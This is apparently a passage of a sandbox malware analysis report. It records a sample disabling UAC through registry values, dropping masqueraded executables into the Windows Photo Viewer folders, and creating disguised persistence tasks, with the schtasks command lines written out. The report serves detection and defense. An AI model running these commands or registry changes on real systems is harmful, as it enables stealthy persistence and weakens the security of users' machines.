| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\de-DE\9e8d7a4ca61bd9 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCX5940.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCX5DC8.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\7a0fd90576e088 | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\ja-JP\RCX5941.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RCX5E46.tmp | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000_Classes\Local Settings | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Program Files (x86)\Windows Photo Viewer\de-DE\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe | N/A |
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe
"C:\Users\Admin\AppData\Local\Temp\192f0f1221e376146e725a4d23ee69a0.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\2f3e0199fccb3f72e8a39924edc6a781\fontdrvhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\ja-JP\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
